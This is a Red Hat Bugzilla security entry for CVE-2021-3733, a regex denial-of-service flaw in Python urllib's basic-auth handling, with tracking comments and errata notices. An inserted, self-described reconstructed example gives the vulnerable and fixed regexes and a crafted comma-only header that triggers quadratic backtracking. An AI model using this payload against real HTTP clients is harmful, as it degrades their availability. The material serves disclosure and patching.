Bug 1995234 (CVE-2021-3733)

Summary: CVE-2021-3733 python: urllib: Regular expression DoS in AbstractBasicAuthHandler
Product: [Other] Security Response
Reporter: Pedro Sampaio <psampaio>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA
QA Contact:
Severity: medium
Docs Contact:
Priority: medium
Version: unspecified
CC: adev88, aos-bugs, bdettelb, carl, caswilli, cstratak, dmalcolm, extras-orphan, fjansen, hhorak, jeffrey.ness, jnakfour, jorton, kaycoth, manisandro, m.cyprian, mhroncok, psegedy, pviktori, python-maint, python-sig, rfreiman, rkuska, shcherbina.iryna, slavek.kabrda, tcullum, thrnciar, TicoTimo, tomckay, torsava, vmugicag, vstinner, ytale
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
Whiteboard:
Fixed In Version: python 3.6.14, python 3.7.11, python 3.8.10, python 3.9.5
Doc Type: If docs needed, set a value
Doc Text:
There is a flaw in the AbstractBasicAuthHandler class of Python's urllib. An attacker who controls a malicious HTTP server to which an HTTP client (for example, a Python application using urllib) connects could trigger a Regular Expression Denial of Service (ReDoS) during an authentication request, by sending a specially crafted payload in the server's authentication challenge to the client. The greatest threat from this flaw is to application availability.
Story Points: ---
Clone Of:
Environment:
Last Closed: 2021-11-02 14:07:50 UTC
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---
Target Upstream Version:
Embargoed:
Bug Depends On: 1996117, 1996118, 1996119, 1996120, 1996134, 1997857, 1997858, 1997860, 1997861, 1997862, 1997863, 1997864, 1997865, 2000681, 2000682, 2000683, 2000684, 2000685, 2000686, 2000687, 2000688, 2001098, 2001099, 2002980, 2064449    
Bug Blocks: 1995235    

Description Pedro Sampaio 2021-08-18 16:33:37 UTC
The ReDoS-vulnerable regex has quadratic worst-case complexity and it allows causing a denial of service when identifying crafted invalid RFCs. This ReDoS issue is on the client side and needs remote attackers to control the HTTP server.

References:

https://bugs.python.org/issue43075
https://github.com/python/cpython/pull/24391

Comment 6 Todd Cullum 2021-08-26 23:06:49 UTC
Flaw summary:

Class AbstractBasicAuthHandler in Python's Lib/urllib/request.py uses a regex pattern `([^ \t]+)` in handling of the HTTP Basic Access Authentication Scheme[1]. This pattern allows for a quadratic time complexity ReDoS to occur when a crafted payload is processed. This flaw is similar to BZ#1809065 but the underlying cause is different; the portion of regex that creates the flaw is different, and the triggering payload is different.


1. https://datatracker.ietf.org/doc/html/rfc2617#section-2
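
Added example (not code from this bug report and not CPython's own source): the WWW-Authenticate pattern used by AbstractBasicAuthHandler before and after the fix, side by side, with a constructed header value that drives the old pattern into quadratic backtracking. The two regexes are reproduced from memory of Lib/urllib/request.py before and after PR 24391 and should be checked against the release you actually run; the helper names, the payload and the timing loop are assumptions made for this demonstration.

```python
import re
import time

# Pattern used by AbstractBasicAuthHandler before the fix for bpo-43075
# (reproduced from memory of Lib/urllib/request.py; verify against the
# release you run). `(?:^|,)` is the earlier fix for CVE-2020-8492
# (BZ#1809065); the remaining weakness is that `[^ \t]+` also matches ','.
VULNERABLE_RX = re.compile(
    '(?:^|,)'        # start of the string or ','
    '[ \t]*'         # optional whitespace
    '([^ \t]+)'      # scheme like "Basic" - but commas are allowed, too
    '[ \t]+'         # mandatory whitespace
    'realm=(["\']?)([^"\']*)\\2',
    re.I)

# Pattern after PR 24391: the scheme may no longer contain ',', so each
# candidate start position fails after one character instead of first
# swallowing the rest of the header and then backtracking over it.
FIXED_RX = re.compile(
    '(?:^|,)'
    '[ \t]*'
    '([^ \t,]+)'     # scheme like "Basic"; stops at ','
    '[ \t]+'
    'realm=(["\']?)([^"\']*)\\2',
    re.I)


def parse_challenge(rx, header_value):
    """Mimic what http_error_auth_reqed extracts from a WWW-Authenticate
    value: (scheme lower-cased, realm), or None when nothing matches."""
    mo = rx.search(header_value)
    if mo is None:
        return None
    scheme, _quote, realm = mo.groups()
    return scheme.lower(), realm


def crafted_header(n):
    """Constructed malicious header value: n commas and no realm. Every
    comma is a fresh start for `(?:^|,)`, and the old `[^ \t]+` then eats
    all remaining commas before backtracking over them one by one: O(n)
    work at each of n positions, so O(n^2) overall."""
    return "," * n


def search_seconds(rx, header_value):
    """Wall-clock seconds for one rx.search(); for demonstration only."""
    t0 = time.perf_counter()
    rx.search(header_value)
    return time.perf_counter() - t0


if __name__ == "__main__":
    # Benign challenges: both patterns extract the same scheme and realm.
    for benign in ('Basic realm="Secure Area"', 'Bearer, Basic realm=x'):
        print(benign, "->", parse_challenge(VULNERABLE_RX, benign),
              parse_challenge(FIXED_RX, benign))
    # Doubling n roughly quadruples the vulnerable pattern's time;
    # the fixed pattern stays in the microsecond range.
    for n in (2000, 4000, 8000):
        h = crafted_header(n)
        print(f"n={n:5d}  vulnerable={search_seconds(VULNERABLE_RX, h):.3f}s"
              f"  fixed={search_seconds(FIXED_RX, h):.6f}s")
```

The payload needs no realm at all: the cost comes from the scheme group being able to span commas, so a header of nothing but commas is enough to make every start position rescan the tail of the string. A server can send that value in a 401 response without any other cooperation from the client.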

Comment 9 Todd Cullum 2021-09-02 17:19:54 UTC
Created mingw-python3 tracking bugs for this issue:

Affects: fedora-all [bug 2000683]


Created python2.7 tracking bugs for this issue:

Affects: fedora-all [bug 2000681]


Created python3.5 tracking bugs for this issue:

Affects: fedora-all [bug 2000685]


Created python3.6 tracking bugs for this issue:

Affects: fedora-all [bug 2000686]


Created python3.7 tracking bugs for this issue:

Affects: fedora-all [bug 2000687]


Created python3.8 tracking bugs for this issue:

Affects: fedora-all [bug 2000684]


Created python3.9 tracking bugs for this issue:

Affects: fedora-all [bug 2000688]


Created python34 tracking bugs for this issue:

Affects: epel-7 [bug 2000682]

Comment 10 Miro Hrončok 2021-09-02 17:29:24 UTC
Todd, what is the purpose of opening the Fedora bugzillas when we already have the fixed versions?

Comment 11 Todd Cullum 2021-09-02 18:03:42 UTC
In reply to comment #10:
> Todd, what is the purpose of opening the Fedora bugzillas when we already
> have the fixed versions?

We usually open them mostly for tracking purposes AFAIK. Typically they are opened immediately when each flaw is filed, but in this case, they didn't get opened right away. Sorry for the delay there - had to work out a kink with the PSModules for Fedora with the Incoming team.

Comment 12 Petr Viktorin (pviktori) 2021-09-03 08:06:15 UTC
> We usually open them mostly for tracking purposes AFAIK.

Do you know who requires this tracking, and why?
If they're really necessary, can you close them after opening?

Comment 16 errata-xmlrpc 2021-11-02 08:43:25 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2021:4057 https://access.redhat.com/errata/RHSA-2021:4057

Comment 17 Product Security DevOps Team 2021-11-02 14:07:50 UTC
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2021-3733

Comment 18 errata-xmlrpc 2021-11-09 17:27:25 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2021:4160 https://access.redhat.com/errata/RHSA-2021:4160

Comment 19 errata-xmlrpc 2022-05-02 08:05:09 UTC
This issue has been addressed in the following products:

  Red Hat Software Collections for Red Hat Enterprise Linux 7

Via RHSA-2022:1663 https://access.redhat.com/errata/RHSA-2022:1663

Comment 20 errata-xmlrpc 2022-05-10 13:18:25 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2022:1764 https://access.redhat.com/errata/RHSA-2022:1764

Comment 21 errata-xmlrpc 2022-05-10 13:39:22 UTC
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 8

Via RHSA-2022:1821 https://access.redhat.com/errata/RHSA-2022:1821